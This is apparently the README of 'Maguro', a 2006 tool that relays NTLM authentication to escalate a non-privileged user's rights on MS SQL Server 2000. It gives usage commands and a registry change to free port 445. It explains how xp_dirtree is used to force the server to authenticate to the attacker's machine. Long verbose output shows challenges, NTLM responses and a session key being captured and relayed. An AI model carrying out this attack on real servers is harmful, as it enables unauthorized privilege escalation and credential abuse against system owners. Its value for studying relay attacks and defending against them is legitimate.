### MAGURO - NTLMSSP puppeteer ### ### MS SQL server remote privilege escalation ### ### (beta release) ### ### ARGENISS -- 2006 ### Brief Description -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Maguro tunnels an TDS/SQL connection to a target SQL server for a non privileged user. The tunnel juggles with the NTLMSSP packets contained in the TDS/SQL connection, and escalates privileges to the ones of the account the SQL server is running as (it won't work if SQL Server is running under Local System account), using the already well known and documented MITM attack to NTLM authentication which has existed for several years now (first detailed information I remember comes from smbrelay's author, Sir Dystic of CULT OF THE DEAD COW [0]). To do so, it forces the target SQL server to connect and authenticate itself to the attacker's machine. See the 'How does this work ???' section for a deeper explanation of the inner workings. Tested on -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= . Windows 2000 SP4 + SQL Server 2000 Usage demostration -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Currently, the tunnel requires an existing DSN to the target SQL server, a DSN should exist in most cases, or you can see [1] to learn how to create one. We use the supplied client sample, cli.py, which basically: a) connects to the provided DSN b) tries to create a TABLE using the following SQL query: create table katakuris (line varchar(42)) you can modify the sample client to execute whatever operation you fancy. Let's see what happens when we run the sample client logged as a user without enough permissions without using our tool: >cli.py w2ks-sql2000 [.] connecting to server w2ks-sql2000... [!] connected to server w2ks-sql2000 OK Traceback (most recent call last): File "C:\tmp\cli.py", line 55, in ? print cursor.execute("create table katakuris (line varchar(42))") dbi.program-error: [Microsoft][ODBC SQL Server Driver][SQL Server]CREATE TABLE permission denied in database 'master'. in EXEC We get the expected permission denied error message. So, what we need to do is: a) configure a DSN similar to the one we want to abuse, but make it listen at the localhost (this is going to be our tunnel DSN) b) start maguro.py: usage: maguro.py tunnel_local_ip sql_server_ip sql_server_DSN for example: >maguro.py 192.168.60.1 192.168.60.131 w2ks-sql2000 where: 192.168.60.1 is the tunnel's local IP address 192.168.60.131 is the target SQL server's IP address w2ks-sql2000 is the DSN we want to abuse b.1) you need to configure your box not to listen to port 445, so that our tunnel can listen to it and forward connections to the server's SMB server: Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters Value: SmbDeviceEnabled Type: DWORD value (REG_DWORD) Content: 0 (to disable) After a reboot, TCP port 445 will no longer be opened by the NetBT driver. Now, we use the sample client, but this time we tell it to connect thru the localhost tunnel DSN (w2ks-sql2000-tunnel instead of w2ks-sql2000): >cli.py w2ks-sql2000-tunnel [.] connecting to server w2ks-sql2000-tunnel... [!] connected to server w2ks-sql2000-tunnel OK Traceback (most recent call last): File "C:\tmp\cli.py", line 55, in ? print cursor.execute("create table katakuris (line varchar(42))") dbi.program-error: [Microsoft][ODBC SQL Server Driver][SQL Server] There is already an object named 'katakuris' in the database. in EXEC This time it worked, our not privileged user was able to execute an arbitrary query !!! How does this work ??? -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Let's analyze maguro's sample output: ### MAGURO - NTLMSSP puppeteer ### ### MS SQL server remote privilege agitator ### ### ARGENISS 2006 ### 0] banner [---] waiting for SQL client connection 1] the tunnel is waiting for our SQL client connection [***] got evil SQL client 2] our client connected to the tunnel's local IP [***] got SQL server CHALLENGE 3] the tunnel connected itself to the target SQL server and sent the client's packets to the SQL server, the server challenges the client to authenticate it [---] challenging SQL server SMB client with the SQL server challenge [-] getting SMB connection from SQL server (DSN=w2ks-sql2000) 4] so the tunnel connects to the SQL server and forces it to connect to 'our' share using xp_dirtree, then it forwards the packets to the SQL server's SMB server; when we observe the SMB server challenging the SQL server, we replace the challenge with the one we got from the SQL server itself [***] got SQL server SMB client RESPONSE 5] we capture the SQL server's challenge response to his own challenge [***] authenticating to SQL server as user A d m i n i s t r a t o r [---] sending response to SQL server 6] and we send it to the SQL server himself [---] tunneling evil client... 7] it's done, now we just tunnel the SQL client to the SQL server Sample fully verbose output -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= >maguro.py 192.168.60.131 ### MAGURO - NTLMSSP puppeteer ### ### MS SQL server remote privilege agitator ### ### ARGENISS 2006 ### usage: maguro.py tunnel_local_ip sql_server_ip sql_server >maguro.py 192.168.60.1 192.168.60.131 w2ks-sql2000 ### MAGURO - NTLMSSP puppeteer ### ### MS SQL server remote privilege agitator ### ### ARGENISS 2006 ### [---] waiting for SQL client connection [-] new TDS client 127.0.0.1 [-] connected to remote SQL server 192.168.60.131 [***] got evil SQL client ======================================== [1->] SQL client -> TDS tunnel [2->] SQL client -> TDS tunnel -> SQL server ======================================== [3<-] TDS tunnel <- SQL server [4<-] SQL client <- TDS tunnel <- SQL server ======================================== [1->] SQL client -> TDS tunnel [2->] SQL client -> TDS tunnel -> SQL server ======================================== [3<-] TDS tunnel <- SQL server !! NTLMSSP: GOT CHALLENGE !! ---------------------------------------- [challenge - 8 bytes] 0b 62 83 ca a8 36 71 f4 ---------------------------------------- [4<-] SQL client <- TDS tunnel <- SQL server [***] got SQL server CHALLENGE [---] challenging SQL server SMB client with the SQL server challenge [-] SMBTuna, waiting for SQL server to connect to SMB tunnel... [-] getting SMB connection from SQL server (DSN=w2ks-sql2000) [-] SMBTuna, SQL server 192.168.60.131 connected to SMB [-] SMBTuna, connected to remote SMB server 192.168.60.131 ======================================== [a->] SMB client -> SMB tunnel [b->] SMB client -> SMB tunnel -> SMB server ======================================== [c<-] SMB tunnel <- SMB server [d<-] SMB client <- SMB tunnel <- SMB server ======================================== [a->] SMB client -> SMB tunnel !! NTLMSSP: STARTED NEGOTIATING !! [b->] SMB client -> SMB tunnel -> SMB server ======================================== [c<-] SMB tunnel <- SMB server !! NTLMSSP: GOT CHALLENGE !! ---------------------------------------- [challenge - 8 bytes] 2f 31 e1 ca 9d ab 88 db ---------------------------------------- ---------------------------------------- [SMB server challenge - 8 bytes] 2f 31 e1 ca 9d ab 88 db ---------------------------------------- [-] SMBTuna, modifying challenge with SQL server challenge: ---------------------------------------- [SQL server challenge - 8 bytes] 0b 62 83 ca a8 36 71 f4 ---------------------------------------- [d<-] SMB client <- SMB tunnel <- SMB server ======================================== [a->] SMB client -> SMB tunnel !! NTLMSSP: GOT AUTH !! [b->] SMB client -> SMB tunnel -> SMB server ======================================== [c<-] SMB tunnel <- SMB server [d<-] SMB client <- SMB tunnel <- SMB server ======================================== [a->] SMB client -> SMB tunnel [b->] SMB client -> SMB tunnel -> SMB server ======================================== [c<-] SMB tunnel <- SMB server [d<-] SMB client <- SMB tunnel <- SMB server ======================================== [a->] SMB client -> SMB tunnel !! NTLMSSP: STARTED NEGOTIATING !! [b->] SMB client -> SMB tunnel -> SMB server ======================================== [c<-] SMB tunnel <- SMB server !! NTLMSSP: GOT CHALLENGE !! ---------------------------------------- [challenge - 8 bytes] f0 7b 2e bb 18 e0 f9 82 ---------------------------------------- ---------------------------------------- [SMB server challenge - 8 bytes] f0 7b 2e bb 18 e0 f9 82 ---------------------------------------- [-] SMBTuna, modifying challenge with SQL server challenge: ---------------------------------------- [SQL server challenge - 8 bytes] 0b 62 83 ca a8 36 71 f4 ---------------------------------------- [d<-] SMB client <- SMB tunnel <- SMB server ======================================== [a->] SMB client -> SMB tunnel !! NTLMSSP: GOT AUTH !! [-] SMBTuna, got SQL server response to challenge ---------------------------------------------------------------------------- ** NTLMSSP:type=3 ---------------------------------------- [lmresponse - 24 bytes] 2a fe 49 f5 e7 09 92 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ---------------------------------------- ---------------------------------------- [ntlmresponse - 24 bytes] 05 e3 ce 38 88 45 c5 bb 44 6b c4 b9 ee d8 b3 06 f9 5b c1 0d 21 43 bd 14 ---------------------------------------- - domain W 2 K S E R V E R - user m a g u r o - host W 2 K S E R V E R ---------------------------------------- [sessionKey - 16 bytes] 11 76 b7 fc 56 11 bd bd 9f 95 a2 25 fb 9c f1 ca ---------------------------------------- ---------------------------------------------------------------------------- [***] got SQL server SMB client RESPONSE [***] authenticating to SQL server as user m a g u r o [---] sending response to SQL server ======================================== [1->] SQL client -> TDS tunnel [-] client TDS paquet: type 17 status 1 size 142/8e !! NTLMSSP: GOT AUTH !! [-] data NTLMSSP len is 134 [-] new NTLMSSP len is 249 [-] changing TDS size to 257/0x101 [-] original data len -> 142 [-] updated data len -> 257 [2->] SQL client -> TDS tunnel -> SQL server ======================================== [3<-] TDS tunnel <- SQL server [4<-] SQL client <- TDS tunnel <- SQL server [---] tunneling evil client... [-] TDSTuna, tunneling master requests... ======================================== [1->] SQL client -> TDS tunnel [2->] SQL client -> TDS tunnel -> SQL server ======================================== [3<-] TDS tunnel <- SQL server [4<-] SQL client <- TDS tunnel <- SQL server ======================================== [1->] SQL client -> TDS tunnel [2->] SQL client -> TDS tunnel -> SQL server References -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [0] smbrelay by Sir Dystic of CULT OF THE DEAD COW http://en.wikipedia.org/wiki/SMBRelay http://209.85.165.104/search?q=cache:7nrEcI3Vkf0J:www.xfocus.net/articles/200305/smbrelay.html+smbrelay&hl=es&gl=es&ct=clnk&cd=1&client=firefox-a [1] Creating a new ODBC DSN http://www.truthsolutions.com/sql/odbc/creating_a_new_odbc_dsn.htm